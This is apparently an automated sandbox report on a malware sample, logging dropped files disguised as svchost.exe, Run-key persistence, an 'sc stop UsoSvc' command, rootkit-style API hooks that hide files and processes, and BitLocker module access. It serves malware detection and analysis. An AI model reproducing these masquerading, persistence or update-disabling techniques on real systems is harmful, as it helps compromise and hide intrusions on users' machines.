Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\python311.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_ssl.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\python3.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\wrapt\_wrappers.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\select.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\libffi-7.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	File created: C:\ProgramData\main.exe	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\python310.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\libcrypto-3.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_sqlite3.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\select.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\python310.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	File created: C:\ProgramData\main.exe	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\gqxqtdeqxchk.sys			Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\wxyubnjmnlae.tmp			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\ProgramData\svchost.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ??????????

Source: C:\ProgramData\svchost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ??????????
Source: C:\ProgramData\svchost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ??????????

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\ProgramData\setup.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 0_2_00007FF6CEB27100 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF6CEB27100

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
